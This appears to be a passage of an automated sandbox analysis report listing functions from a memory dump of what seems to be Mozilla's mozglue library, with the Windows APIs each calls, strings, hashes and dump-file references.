                                                                                                                                                                                                                                                                                        • API String ID: 4074790623-38302674
                                                                                                                                                                                                                                                                                        • Opcode ID: bd4f9a1abab8c956e2669e0b8e4dc52d9583475375fafa0ffc0005534789fd81
                                                                                                                                                                                                                                                                                        • Instruction ID: 4d3f8cc7a15a501c7e9e2f23ae72ba8ba381af41f81348bcc3c58c195457fac3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd4f9a1abab8c956e2669e0b8e4dc52d9583475375fafa0ffc0005534789fd81
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EA1AD3160A3429FDB00DF28C984B5ABBF5AF89748F148E2DE999D7741D735E805CB82
                                                                                                                                                                                                                                                                                        Function 6C98C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C98C784
                                                                                                                                                                                                                                                                                        • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C98C801
                                                                                                                                                                                                                                                                                        • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C98C83D
                                                                                                                                                                                                                                                                                        • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C98C891
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                                                                                                                                                                                        • String ID: INF$NAN$inf$nan
                                                                                                                                                                                                                                                                                        • API String ID: 1991403756-4166689840
                                                                                                                                                                                                                                                                                        • Opcode ID: 7eb72e2d7bc6875c961db0aba4d3dff7602a9f65ece7454d1b48b9513da6731c
                                                                                                                                                                                                                                                                                        • Instruction ID: c7010a11a432cb8ecf2475fe7b871d1353d5c18ef2c8b2421e8c52977ba24628
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7eb72e2d7bc6875c961db0aba4d3dff7602a9f65ece7454d1b48b9513da6731c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA5180719097808BDB00AF2CC48169AFBF4BF9A308F408E2DF9D5A7651E770D985CB42
                                                                                                                                                                                                                                                                                        Function 6C964480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3009372454-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b6f3e0b0c45f9f0254acbc676f9d6549eb6aae1470928b922c35e8f337be6040
                                                                                                                                                                                                                                                                                        • Instruction ID: ef78ca1a2be99e36d69b1726d17566af4f7797fedd113f85631795d7642216ed
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6f3e0b0c45f9f0254acbc676f9d6549eb6aae1470928b922c35e8f337be6040
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77B1E071A001118FEB18DEAECCB076D76A6AF52328F184669E816DBFD6D730D8448F91
                                                                                                                                                                                                                                                                                        Function 6C9CAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                                        • Opcode ID: aeab245ff0520d0c25bef27baad138159b5e902f0a2f974ec9e1e2baf72d5775
                                                                                                                                                                                                                                                                                        • Instruction ID: 4b684cd9fbbc8652758ac8e89f29857e4206b5016d9143b5e58397c321739914
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aeab245ff0520d0c25bef27baad138159b5e902f0a2f974ec9e1e2baf72d5775
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 143160B1A08744CFDB40EF78D64826EBBF0BF99305F11492DE98597211EB709498CB83
                                                                                                                                                                                                                                                                                        Function 6C979620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C979675
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C979697
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9796E8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C979707
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C97971F
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C979773
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9797B7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C9797D0
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C9797EB
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C979824
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 409848716-3880535382
                                                                                                                                                                                                                                                                                        • Opcode ID: 98fc70c33c622012ef72bd9233435f8807c6818598198a588f2c0f14928c3702
                                                                                                                                                                                                                                                                                        • Instruction ID: 7e8fdfc8ad5144517c21ce8df4b63a26a1bcd6f2cd03ec9c488c05dc062ef457
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98fc70c33c622012ef72bd9233435f8807c6818598198a588f2c0f14928c3702
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D41D371705205DBDF10CFA6E885A9677B4FFAEB28F21452AED1587B40D731E804CBA1
                                                                                                                                                                                                                                                                                        Function 6C961E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE784), ref: 6C961EC1
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784), ref: 6C961EE1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE744), ref: 6C961F38
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE744), ref: 6C961F5C
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C961F83
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784), ref: 6C961FC0
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE784), ref: 6C961FE2
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784), ref: 6C961FF6
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C962019
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                                                                                                                                        • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                        • API String ID: 2055633661-2608361144
                                                                                                                                                                                                                                                                                        • Opcode ID: 2d495351624decf2593bee35b9a459aeddf51a7ec0c2cace7f58f77aded56519
                                                                                                                                                                                                                                                                                        • Instruction ID: f2ba052cf7492c0464a59c082c8487f3e70b98e54af125d4dc2e61d60cbfbf54
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d495351624decf2593bee35b9a459aeddf51a7ec0c2cace7f58f77aded56519
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4941F471B0531A8FEF518F6AC884B6A36B5EF6E708F140029F90597B85DB72D8048BD5
                                                                                                                                                                                                                                                                                        Function 6C9B0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B0039
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9B0041
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B0075
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9B0082
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000048), ref: 6C9B0090
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9B0104
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9B011B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C9B005B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                                                                                                                                                                                                                        • API String ID: 3012294017-637075127
                                                                                                                                                                                                                                                                                        • Opcode ID: 97c9f2ec53b020f6942af883f80b1dcf4d860338ac7e3980faf377adf933e758
                                                                                                                                                                                                                                                                                        • Instruction ID: 83b4b0540abaf1bb62a3b2058e3ef1be286db73bf313fde8a62dc9c725deecab
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97c9f2ec53b020f6942af883f80b1dcf4d860338ac7e3980faf377adf933e758
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08419AB1504344EFCB50CF64D844A9BBBF4FF69218F10491EE95A93B40E731E915CBA1
                                                                                                                                                                                                                                                                                        Function 6C977E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C977EA7
                                                                                                                                                                                                                                                                                        • malloc.MOZGLUE(00000001), ref: 6C977EB3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C97CB49
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C97CBB6
                                                                                                                                                                                                                                                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C977EC4
                                                                                                                                                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C977F19
                                                                                                                                                                                                                                                                                        • malloc.MOZGLUE(?), ref: 6C977F36
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C977F4D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                                                        • API String ID: 204725295-2564639436
                                                                                                                                                                                                                                                                                        • Opcode ID: 3fb1e5cc49dcc8dca1e46f7913232e9ae6d7162592cb6cbe13af23b745bdbef5
                                                                                                                                                                                                                                                                                        • Instruction ID: 69a7468ac97b922f51e652ed1b7a15066488a7417b186f7dc6e22aaa526188eb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fb1e5cc49dcc8dca1e46f7913232e9ae6d7162592cb6cbe13af23b745bdbef5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5431E962E04688D7DB019B68CC045FEB778EFA6208F155629DD4567712FB30E5C8C7A0
                                                                                                                                                                                                                                                                                        Function 6C973E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C973EEE
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C973FDC
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C974006
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C9740A1
                                                                                                                                                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C973CCC), ref: 6C9740AF
                                                                                                                                                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C973CCC), ref: 6C9740C2
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C974134
                                                                                                                                                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C973CCC), ref: 6C974143
                                                                                                                                                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C973CCC), ref: 6C974157
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3680524765-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                                                                                        • Instruction ID: 154d79d16b68656d1e0cffe2cefc1c33a0585978868b3b81a8efc5d96e57a80d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9A18FB1A01215CFEB50CF68C880769B7B5FF58308F2541A9D909AF742D771E996CFA0
                                                                                                                                                                                                                                                                                        Function 6C962030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,6C983F47,?,?,?,6C983F47,6C981A70,?), ref: 6C96207F
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,6C983F47,?,6C983F47,6C981A70,?), ref: 6C9620DD
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C983F47,6C981A70,?), ref: 6C96211A
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE744,?,6C983F47,6C981A70,?), ref: 6C962145
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C983F47,6C981A70,?), ref: 6C9621BA
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE744,?,6C983F47,6C981A70,?), ref: 6C9621E0
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE744,?,6C983F47,6C981A70,?), ref: 6C962232
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                                                                                                                                        • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                                                                                                                                        • API String ID: 889484744-884734703
                                                                                                                                                                                                                                                                                        • Opcode ID: 69ff7bd8220be52a33ba63fe6e8d6b4849b38a1ad3e39aae8b59a4c1d8d43d18
                                                                                                                                                                                                                                                                                        • Instruction ID: 3955bf924c4e04d34babe6acadf24d2fcac83a72945dca7d4093b150ef59391f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69ff7bd8220be52a33ba63fe6e8d6b4849b38a1ad3e39aae8b59a4c1d8d43d18
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F361E432F046068FEB04CB6AC88976E77B5AFA9318F294139E524A7ED4D731D900C781
                                                                                                                                                                                                                                                                                        Function 6C9648E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C9A483A,?), ref: 6C964ACB
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C9A483A,?), ref: 6C964AE0
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(FFFE15BF,?,6C9A483A,?), ref: 6C964A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: mozalloc_abort.MOZGLUE(?), ref: 6C97CAA2
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C9A483A,?), ref: 6C964A97
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(15D4E801,?,6C9A483A,?), ref: 6C964A35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C9A483A,?), ref: 6C964A4A
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(15D4E824,?,6C9A483A,?), ref: 6C964AF4
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(FFFE15E2,?,6C9A483A,?), ref: 6C964B10
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(8E8E0022,?,6C9A483A,?), ref: 6C964B2C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
